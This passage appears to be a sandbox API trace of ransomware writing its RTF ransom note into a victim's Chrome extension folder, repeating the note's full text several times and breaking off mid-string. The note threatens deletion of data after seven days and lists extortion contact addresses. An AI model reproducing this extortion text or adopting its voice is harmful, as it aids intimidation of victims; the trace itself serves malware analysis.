ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n;\x08(v", lpUsedDefaultChar=0x0) returned 8717 [0289.183] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.185] CloseHandle (hObject=0x2d4) returned 1 [0289.185] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0289.185] GetLastError () returned 0x2 [0289.185] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable 